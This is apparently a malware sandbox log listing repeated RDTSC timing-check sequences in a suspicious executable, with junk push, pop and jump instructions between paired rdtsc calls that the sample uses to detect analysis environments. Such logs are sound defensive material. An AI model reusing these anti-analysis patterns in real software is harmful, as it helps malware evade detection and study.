Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14F5497 second address: 14F54A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F8C6D17D0A6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14FB46F second address: 14FB47C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F8C6CC6478Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14FBA6E second address: 14FBA72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14FBA72 second address: 14FBA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8C6CC6478Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14FBA86 second address: 14FBA8C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14FBA8C second address: 14FBA92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14FB052 second address: 14FB064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F8C6D17D0A6h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14FB064 second address: 14FB06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14FB06A second address: 14FB07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14FB07D second address: 14FB082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14FBD4B second address: 14FBD84 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8C6D17D0A6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F8C6D17D0A8h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F8C6D17D0AEh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F8C6D17D0B0h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14FBD84 second address: 14FBD88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14FBD88 second address: 14FBDA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0ACh 0x00000007 jo 00007F8C6D17D0A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F8C6D17D0AAh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14FC07F second address: 14FC08D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14FC08D second address: 14FC0A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8C6D17D0A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F8C6D17D0A6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C4919 second address: 14C491E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C4EAA second address: 14C4EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C5091 second address: 14C50D0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], esi 0x00000009 call 00007F8C6CC64792h 0x0000000e jmp 00007F8C6CC64791h 0x00000013 pop ecx 0x00000014 nop 0x00000015 push esi 0x00000016 jmp 00007F8C6CC6478Ah 0x0000001b pop esi 0x0000001c push eax 0x0000001d pushad 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C598B second address: 14C5995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C5995 second address: 14C5999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C5999 second address: 14C59B4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8C6D17D0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F8C6D17D0ACh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C59B4 second address: 14C59B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C59B9 second address: 14C59D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jnp 00007F8C6D17D0C3h 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F8C6D17D0A6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1501636 second address: 150163B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 150163B second address: 150167B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B5h 0x00000007 push edx 0x00000008 jmp 00007F8C6D17D0B7h 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 js 00007F8C6D17D0C2h 0x00000016 push eax 0x00000017 push edx 0x00000018 je 00007F8C6D17D0A6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 150167B second address: 1501684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1501684 second address: 150168A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15017F5 second address: 150180F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6CC64795h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 150180F second address: 1501848 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8C6D17D0AEh 0x00000008 pushad 0x00000009 jl 00007F8C6D17D0A6h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F8C6D17D0B6h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1501848 second address: 150184D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15019C7 second address: 15019D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F8C6D17D0ACh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1501C67 second address: 1501C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1501C6B second address: 1501C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1501C6F second address: 1501C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F8C6CC6478Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1501C7D second address: 1501C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1501C89 second address: 1501C8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 150AB34 second address: 150AB3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 150AB3B second address: 150AB77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F8C6CC64799h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F8C6CC64796h 0x00000011 popad 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14881FC second address: 1488225 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8C6D17D0AEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F8C6D17D0AAh 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 je 00007F8C6D17D0A6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1488225 second address: 148822B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 148822B second address: 148823F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6D17D0ABh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 148823F second address: 1488254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6CC64791h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1488254 second address: 1488271 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8C6D17D0B3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1488271 second address: 1488275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15097FF second address: 1509823 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8C6D17D0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F8C6D17D0A8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jl 00007F8C6D17D0B6h 0x00000019 pushad 0x0000001a push edi 0x0000001b pop edi 0x0000001c jnp 00007F8C6D17D0A6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 150A1FF second address: 150A210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8C6CC64786h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 150A210 second address: 150A214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 150A383 second address: 150A387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14817A4 second address: 14817C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6D17D0B2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8C6D17D0ACh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1510CBA second address: 1510CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15137F1 second address: 15137F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15137F9 second address: 15137FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15134FE second address: 1513504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1513504 second address: 151352A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6CC64797h 0x00000009 jbe 00007F8C6CC64786h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 151352A second address: 1513537 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1513537 second address: 1513541 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8C6CC64786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1513541 second address: 151354B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8C6D17D0B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 151A182 second address: 151A18E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007F8C6CC64786h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 151A18E second address: 151A194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1518A30 second address: 1518A50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6CC6478Dh 0x00000009 jmp 00007F8C6CC6478Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1518A50 second address: 1518A77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8C6D17D0B7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1518A77 second address: 1518A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1518A7B second address: 1518A7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1518A7F second address: 1518A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1518A85 second address: 1518AAE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8C6D17D0B5h 0x00000008 jmp 00007F8C6D17D0ACh 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1518AAE second address: 1518AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1518AB2 second address: 1518AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1519050 second address: 1519054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1519054 second address: 151906F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1519364 second address: 151937D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F8C6CC64786h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007F8C6CC64786h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 151DE6B second address: 151DE74 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 151DE74 second address: 151DE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6CC6478Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 151D7CE second address: 151D7D3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14866B3 second address: 14866C3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8C6CC64786h 0x00000008 jnl 00007F8C6CC64786h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14866C3 second address: 1486701 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8C6D17D0AEh 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F8C6D17D0A6h 0x00000010 jmp 00007F8C6D17D0AFh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007F8C6D17D0ACh 0x0000001f jmp 00007F8C6D17D0AFh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152112B second address: 152113C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6CC6478Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521453 second address: 1521464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6D17D0ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521464 second address: 1521469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521469 second address: 152148B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8C6D17D0B7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152148B second address: 15214B7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8C6CC64786h 0x00000008 jl 00007F8C6CC64786h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push esi 0x00000013 jmp 00007F8C6CC64795h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15214B7 second address: 15214BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15214BB second address: 15214C5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8C6CC64786h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152163E second address: 1521644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521644 second address: 1521648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521648 second address: 152164C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152164C second address: 1521652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521652 second address: 1521658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521A96 second address: 1521AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8C6CC64795h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521AB6 second address: 1521ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521ABF second address: 1521AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jnc 00007F8C6CC64786h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521AD2 second address: 1521ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
